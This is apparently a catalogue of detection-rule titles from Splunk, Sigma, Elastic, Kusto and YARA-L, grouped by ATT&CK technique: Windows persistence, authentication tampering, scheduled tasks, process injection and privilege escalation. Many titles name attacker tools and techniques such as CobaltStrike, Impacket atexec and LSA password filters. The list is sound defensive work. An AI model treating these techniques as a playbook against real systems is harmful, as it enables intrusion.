- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Sigma System Scripts Autorun Keys Modification test
- Elastic Uncommon Registry Persistence Change production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Authentication Package T1547.002 7 rules
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Suspicious Activity Using SeCEdit test
Boot or Logon Autostart Execution: Time Providers T1547.003 3 rules
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Elastic Potential Persistence via Time Provider Modification production
- Splunk Time Provider Persistence Registry production
Boot or Logon Autostart Execution: Winlogon Helper DLL T1547.004 7 rules
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
Boot or Logon Autostart Execution: Security Support Provider T1547.005 5 rules
- Elastic Installation of Security Support Provider production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Windows Security Support Provider Reg Query production
Boot or Logon Autostart Execution: Kernel Modules and Extensions T1547.006 2 rules
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
Boot or Logon Autostart Execution: LSASS Driver T1547.008 4 rules
- Sigma DLL Load via LSASS test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
Boot or Logon Autostart Execution: Shortcut Modification T1547.009 10 rules
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma Desktop.INI Created by Uncommon Process test
- Sigma New Custom Shim Database Created test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma Windows Network Access Suspicious desktop.ini Action test
Boot or Logon Autostart Execution: Port Monitors T1547.010 11 rules
- Sigma Add Port Monitor Persistence in Registry test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Splunk Monitor Registry Keys for Print Monitors production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Boot or Logon Autostart Execution: Print Processors T1547.012 8 rules
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
Boot or Logon Autostart Execution: Active Setup T1547.014 4 rules
- Splunk Active Setup Registry Autostart production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
Compromise Host Software Binary T1554 15 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma DNS HybridConnectionManager Service Bus test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HybridConnectionManager Service Installation test
- Kusto Potential Build Process Compromise
- Kusto Potential Build Process Compromise - MDE available
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Kusto SUNSPOT malware hashes available
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious Outlook Child Process production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Privilege Escalation
Boot or Logon Initialization Scripts T1037 10 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Elastic Startup/Logon Script added to Group Policy Object production
- Elastic Uncommon Registry Persistence Change production
- Sigma Uncommon Userinit Child Process test
Boot or Logon Initialization Scripts: Logon Script (Windows) T1037.001 8 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Sigma Uncommon Userinit Child Process test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Process Injection T1055 125 rules
- Kusto ADWS Connection from Process Injection Target
- Sigma APT PRIVATELOG Image Load Pattern test
- Sigma CobaltStrike Named Pipe test
- Sigma CobaltStrike Named Pipe Pattern Regex test
- Sigma CobaltStrike Named Pipe Patterns test
- Elastic Conhost Spawned By Suspicious Parent Process production
- Splunk Create Remote Thread In Shell Application production
- Sigma Created Files by Microsoft Sync Center test
- Sigma CreateRemoteThread API and LoadLibrary test
- Splunk DLLHost with no Command Line Arguments with Network production
- Sigma Dllhost.EXE Execution Anomaly test
- Sigma DotNet CLR DLL Loaded By Scripting Applications test
- Splunk GPUpdate with no Command Line Arguments with Network production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - CoercedPotato Execution test
- Sigma HackTool - CoercedPotato Named Pipe Creation test
- Sigma HackTool - DInjector PowerShell Cradle Execution test
- Sigma HackTool - EfsPotato Named Pipe Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Sigma Injected Browser Process Spawning Rundll32 - GuLoader Activity test
- Splunk Known Process Injection Commands (PowerShell)
- Splunk Known Process Injection Commands (Sysmon)
- Splunk Known Process Injection Commands (Windows Event Log)
- Splunk Loading Of Dynwrapx Module production
- Sigma Lummac Stealer Activity - Execution Of More.com And Vbc.exe experimental
- Sigma Malicious Named Pipe Created test
- Sigma Malware Shellcode in Verclsid Target Process test
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated Via Notepad.EXE test
- Splunk Notepad with no Command Line Arguments production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Dridex Activity stable
- Sigma Potential Executable Run Itself As Sacrificial Process experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Elastic Potential Process Injection from Malicious Document production
- Sigma Potential Process Injection Via Msra.EXE test
- Sigma Potential Shellcode Injection test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Remote Thread To Known Windows Process production
- Sigma PowerShell ShellCode test
- Sigma Process Creation Using Sysnative Folder test
- Splunk Process Executed with Null Command Line (Sysmon)
- Splunk Process Executed with Null Command Line (Windows Event Log)
- Elastic Process Injection by the Microsoft Build Engine production
- Kusto Process Injection From Untrusted Process
- Kusto Process Injection Initiated By MMC
- Splunk Rare Remote Thread (Sysmon)
- Sigma Rare Remote Thread Creation By Uncommon Source Image test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Splunk Remote Thread Created by Uncommon Process (Sysmon)
- Sigma Remote Thread Created In Shell Application test
- Sigma Remote Thread Creation By Uncommon Source Image test
- Sigma Remote Thread Creation In Uncommon Target Image test
- Splunk Remote Thread from Suspicious Folder (Sysmon)
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Splunk Rundll32 Create Remote Thread To A Process production
- Splunk Rundll32 CreateRemoteThread In Browser production
- Splunk SearchProtocolHost with no Command Line with Network production
- Kusto Solorigate Named Pipe
- Sigma Suspect Svchost Activity test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Elastic Suspicious Communication App Child Process production
- Splunk Suspicious DLLHost no Command Line Arguments production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious GPUpdate no Command Line Arguments production
- Kusto Suspicious named pipes available
- Elastic Suspicious Outlook Child Process production
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Suspicious Rundll32 Invoking Inline VBScript test
- Splunk Suspicious SearchProtocolHost no Command Line Arguments production
- Sigma Suspicious Userinit Child Process test
- Elastic Suspicious Zoom Child Process production
- Sigma TAIDOOR RAT DLL Load test
- Splunk Trickbot Named Pipe production
- Sigma Uncommon Process Access Rights For Target Image test
- Sigma Uncommon Svchost Command Line Parameter experimental
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Elastic Unusual Child Process from a System Virtual Process production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
- Splunk Unusual svchost Child Process (Sysmon)
- Splunk Unusual svchost Child Process (Windows Event Log)
- Splunk Windows List ENV Variables Via SET Command From Uncommon Parent production
- Splunk Windows Process Injection In Non-Service SearchIndexer production
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection Wermgr Child Process production
- Splunk Windows Process Injection With Public Source Path production
- Splunk Windows Process With NamedPipe CommandLine production
- Splunk Windows PUA Named Pipe production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Remote Assistance Spawning Process production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Winhlp32 Spawning a Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Process Injection: Dynamic-link Library Injection T1055.001 19 rules
- Sigma CreateRemoteThread API and LoadLibrary test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Splunk Loading Of Dynwrapx Module production
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma TAIDOOR RAT DLL Load test
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Rasautou DLL Execution production
Process Injection: Portable Executable Injection T1055.002 6 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto Process Injection From Untrusted Process
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection With Public Source Path production
Process Injection: Thread Execution Hijacking T1055.003 3 rules
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Remote Thread Creation In Uncommon Target Image test
Process Injection: Asynchronous Procedure Call T1055.004 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Process Injection: Process Hollowing T1055.012 10 rules
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Elastic Suspicious Endpoint Security Parent Process production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
Process Injection: Process Doppelgänging T1055.013 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Exploitation for Privilege Escalation T1068 62 rules
- Sigma Audit CVE Event test
- Splunk Child Processes of Spoolsv exe experimental
- Sigma Computer account created with privileges experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Consent.exe Suspicious Child Process (Sysmon)
- Splunk Consent.exe Suspicious Child Process (Windows Event Log)
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Driver as Command Parameter (Windows Event Log)
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Kusto Email access via active sync
- Splunk Executable Running as NT AUTHORITY_SYSTEM Registered in BAM (Sysmon)
